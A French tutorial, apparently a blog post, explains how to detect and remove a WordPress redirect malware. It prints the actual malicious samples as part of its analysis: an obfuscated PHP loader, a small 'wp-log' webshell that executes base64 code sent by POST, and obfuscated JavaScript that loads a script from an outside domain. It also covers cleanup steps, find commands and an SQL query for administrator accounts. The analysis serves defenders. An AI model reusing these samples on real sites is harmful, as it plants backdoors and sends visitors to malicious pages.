WordPress c'est certainement la plateforme la plus utilisée CMS (Content Management System) pour les blogs et les boutiques en ligne starter (avec le module WooCommerce), ce qui en fait le plus ciblé par les attaques informatiques (hacking). L'une des opérations de piratage les plus utilisées vise à rediriger le site Web compromis vers d'autres pages Web. Redirect WordPress Hack 2023 est un logiciel malveillant relativement nouveau qui a pour effet de rediriger l'intégralité du site vers des pages Web de spam ou qui, à son tour, peut infecter les ordinateurs des utilisateurs.
Si votre site s'est développé sur WordPress est redirigé vers un autre site, alors il est très probablement victime du hack de redirection déjà célèbre.
Dans ce tutoriel, vous trouverez les informations nécessaires et des conseils utiles grâce auxquels vous pouvez dé-viruser un site Web infecté par une redirection WordPress Hack (Virus Redirect). Grâce aux commentaires, vous pouvez obtenir des informations supplémentaires ou demander de l'aide.
Sommaire
Détection du virus qui redirige les sites WordPress
Une diminution soudaine et injustifiée du trafic sur le site Web, une diminution du nombre de commandes (dans le cas des boutiques en ligne) ou des revenus publicitaires sont les premiers signes que quelque chose ne va pas. Détecter "Redirect WordPress Hack 2023» (Virus Redirect) peut également se faire « visuellement » lorsque vous ouvrez le site Web et que vous êtes redirigé vers une autre page Web.
Par expérience, la plupart des logiciels malveillants Web sont compatibles avec les navigateurs Internet : Chrome, Firefox, Edge, Opera. Si vous êtes un utilisateur d'ordinateur Mac, ces virus ne sont pas vraiment visibles dans le navigateur Safari. Système de sécurité de Safari bloquer silencieusement ces scripts malveillants.
Que faire si vous avez un site Web infecté par Redirect WordPress Hack
J'espère que la première étape n'est pas de paniquer ou de supprimer le site Web. Même les fichiers infectés ou contenant des virus ne doivent pas être supprimés dans un premier temps. Ils contiennent des informations précieuses qui peuvent vous aider à comprendre où se trouve la faille de sécurité et ce qui a affecté le virus. Mode opératoire.
Fermer le site Web au public.
Comment fermez-vous un site Web viral aux visiteurs ? Le plus simple est d'utiliser le gestionnaire DNS et de supprimer l'IP pour "A" (le nom de domaine) ou de définir une IP inexistante. Ainsi, les visiteurs du site Web seront protégés de cette redirect WordPress hack ce qui peut les conduire à des virus ou à des pages Web SPAM.
Si tu utilises CloudFlare en tant que gestionnaire DNS, vous vous connectez au compte et supprimez les enregistrements DNS "A” pour le nom de domaine. Ainsi, le domaine touché par le virus restera sans IP, ne pouvant plus être accessible depuis Internet.
Vous copiez l'adresse IP du site Web et vous la "routez" pour que vous seul puissiez y accéder. De votre ordinateur.
Comment changer la véritable adresse IP d'un site Web sur les ordinateurs Windows?
La méthode est souvent utilisée pour bloquer l'accès à certains sites Web en éditant le fichier "hosts".
1. Vous ouvrez Notepad ou autre éditeur de texte (avec droits administrator) et éditez le fichier "hosts". Il est situé dans:
C:\Windows\System32\drivers\etc\hosts2. Dans le fichier "hosts", ajoutez "route" à l'adresse IP réelle de votre site Web. IP supprimée ci-dessus du gestionnaire DNS.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3. Enregistrez le fichier et accédez au site Web dans le navigateur.
Si le site Web ne s'ouvre pas et que vous n'avez rien fait de mal dans le fichier "hosts", il s'agit probablement d'un cache DNS.
Pour effacer le cache DNS sur un système d'exploitation Windows, ouvrir Command Prompt, où vous exécutez la commande :
ipconfig /flushdnsComment changer la véritable adresse IP d'un site Web sur les ordinateurs Mac / MacLivre?
Pour les utilisateurs d'ordinateurs Mac il est un peu plus simple de changer la véritable adresse IP d'un site Web.
1. Ouvrez l'utilitaire Terminal.
2. Exécutez la ligne de commande (nécessite un mot de passe système pour s'exécuter) :
sudo nano /etc/hosts3. Comme pour les ordinateurs Windows, ajoutez l'adresse IP réelle du domaine.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4. Enregistrez les modifications. Ctrl+X (y).
Après avoir été "routé", vous êtes la seule personne qui peut accéder au site Web infecté avec Redirect WordPress Hack.
Sauvegarde complète du site Web – Fichiers et base de données
Même s'il est infecté par "redirect WordPress hack”, la recommandation est de faire une sauvegarde générale de l'ensemble du site Web. Fichiers et base de données. Vous pouvez également enregistrer une copie locale des deux fichiers à partir de public / public_html ainsi que la base de données.
Identification des fichiers infectés et de ceux modifiés par Redirect WordPress Hack 2023
Les principaux fichiers cibles du WordPress il y a index.php (à la racine), header.php, index.php şi footer.php du thème WordPress actifs. Vérifiez manuellement ces fichiers et identifiez le code malveillant ou un script malveillant.
En 2023, un virus de la «Redirect WordPress Hack» mettre en index.php un code de la forme :
(Je ne recommande pas d'exécuter ces codes !)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>Décodé, ce script malveillant c'est essentiellement la conséquence de l'infection du site Web WordPress. Ce n'est pas le script derrière le malware, c'est le script qui permet de rediriger la page Web infectée. Si on décode le script ci-dessus, on obtient :
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Pour identifier tous les fichiers du serveur qui contiennent ce code, il est bon d'avoir accès SSH au serveur pour exécuter la vérification des fichiers et les lignes de commande de gestion sur Linux.
Connexe: Comment savoir si votre blog est infecté ou non, avec de l'aide Google Search . (WordPress Virus)
Vous trouverez ci-dessous deux commandes qui sont certainement utiles pour identifier les fichiers récemment modifiés et les fichiers contenant un certain code (chaîne).
Comment voyez-vous sur Linux Les fichiers PHP ont été modifiés au cours des dernières 24 heures ou à un autre moment ?
Ordre "find” est très simple à utiliser et permet une personnalisation pour définir la période de temps, le chemin dans lequel la recherche est effectuée et le type de fichiers.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"Dans la sortie, vous recevrez des informations sur la date et l'heure de modification du fichier, les autorisations d'écriture / lecture / exécution (chmod) et à quel groupe/utilisateur il appartient.
Si vous souhaitez vérifier il y a plus de jours, modifiez la valeur "-mtime -1" Ou utiliser "-mmin -360” pendant minutes (6 heures).
Comment rechercher un code (chaîne) dans les fichiers PHP, Java ?
La ligne de commande "find" qui permet de retrouver rapidement tous les fichiers PHP ou Java contenant un certain code est la suivante :
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +La commande recherchera et affichera les fichiers .php şi .js contenant "uJjBRODYsU" .
À l'aide des deux commandes ci-dessus, vous saurez très facilement quels fichiers ont été modifiés récemment et lesquels contiennent du code malveillant.
Supprime le code malveillant des fichiers modifiés sans compromettre le code correct. Dans mon scénario, le logiciel malveillant a été placé avant l'ouverture <head>.
Lors de l'exécution de la première commande "find", il est très possible de découvrir de nouveaux fichiers sur le serveur, qui ne sont pas les vôtres WordPress ni mis là par vous. Fichiers appartenant au type de virus Redirect WordPress Hack.
Dans le scénario que j'ai étudié, les fichiers de la forme "wp-log-nOXdgD.php". Ce sont des fichiers "spawn" qui contiennent également du code malveillant utilisé par le virus pour la redirection.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}Le but des fichiers de type "wp-log-*” est de propager le virus de piratage de redirection vers d'autres sites Web hébergés sur le serveur. Il s'agit d'un code malveillant du type "webshell» composé d'un section de base (dans lequel certaines variables chiffrées sont définies) et o partie exécution par lequel l'attaquant tente de charger et d'exécuter un code malveillant sur le système.
S'il existe une variable POST nommé 'bh' et sa valeur chiffrée MD5 est égal à "8f1f964a4b4d8d1ac3f0386693d28d03", alors le script apparaît pour écrire le contenu crypté base64 d'une autre variable appelée 'b3' dans un fichier temporaire, puis essaie d'inclure ce fichier temporaire.
S'il existe une variable POST ou GET nommé 'tick', le script répondra avec la valeur MD5 de la chaîne "885" .
Pour identifier tous les fichiers du serveur contenant ce code, choisissez une chaîne commune, puis exécutez la commande "find» (semblable à celui ci-dessus). Supprimer tous les fichiers contenant ce code malveillant.
Faille de sécurité exploitée par Redirect WordPress Hack
Très probablement, ce virus de redirection arrive via exploitation de l'utilisateur d'administration WordPress ou en identifiant un greffon vulnérable qui permet d'ajouter des utilisateurs avec des privilèges de administrator.
Pour la plupart des sites Web construits sur la plate-forme WordPress c'est possible modification de fichiers de thème ou de plug-indepuis l'interface d'administration (Dashboard). Ainsi, une personne malveillante peut ajouter du code malveillant aux fichiers de thème pour générer les scripts présentés ci-dessus.
Voici un exemple d'un tel code malveillant :
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript identifié dans l'en-tête du thème WordPress, immédiatement après ouverture de l'étiquette <head>.
Il est assez difficile de déchiffrer ce JavaScript, mais il est évident qu'il interroge une autre adresse web d'où il va très probablement chercher d'autres scripts pour créer les fichiers "wp-log-*" dont j'ai parlé plus haut.
Rechercher et supprimer ce code de tous les fichiers PHP affecté.
Autant que je sache, ce code était ajouté manuellement par un nouvel utilisateur avec des privilèges administratifs.
Ainsi, pour empêcher l'ajout de logiciels malveillants depuis le tableau de bord, il est préférable de désactiver l'option d'édition WordPress Thèmes / Plugins depuis le Dashboard.
Modifier le fichier wp-config.php et ajouter les lignes :
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);Après avoir effectué cette modification, aucun utilisateur WordPress vous ne pourrez plus modifier les fichiers à partir du tableau de bord.
Vérifier les utilisateurs avec le rôle de Administrator
Vous trouverez ci-dessous une requête SQL que vous pouvez utiliser pour rechercher des utilisateurs ayant le rôle de administrator dans la plateforme WordPress:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'Cette requête renverra tous les utilisateurs de la table wp_users qui a confié le rôle de administrator. La requête est également effectuée pour la table wp_usermeta pour chercher dans meta 'wp_capabilities', qui contient des informations sur les rôles des utilisateurs.
Une autre méthode consiste à les identifier à partir de : Dashboard → Users → All Users → Administrator. Cependant, il existe des pratiques par lesquelles un utilisateur peut être masqué dans le panneau Tableau de bord. Donc, la meilleure façon de voir les utilisateurs "Administrator"en WordPress est la commande SQL ci-dessus.
Dans mon cas, j'ai identifié dans la base de données l'utilisateur avec le nom "wp-import-user". Assez suggestif.
De là, vous pouvez également voir la date et l'heure à laquelle l'utilisateur WordPress a été créé. L'ID utilisateur est également très important car il recherche les journaux du serveur. De cette façon, vous pouvez voir toute l'activité de cet utilisateur.
Supprimer les utilisateurs avec le rôle de administrator que vous ne connaissez pas, alors changer les mots de passe à tous les utilisateurs administratifs. Éditeur, auteur, Administrator.
Modifier le mot de passe de l'utilisateur de la base de données SQL du site Web concerné.
Après avoir suivi ces étapes, le site Web peut être redémarré pour tous les utilisateurs.
Gardez à l'esprit, cependant, que ce que j'ai présenté ci-dessus est l'un des milliers de scénarios dans lesquels un site Web est infecté par Redirect WordPress Hack en 2023.
Si votre site Web a été infecté et que vous avez besoin d'aide ou si vous avez des questions, la section des commentaires est ouverte.
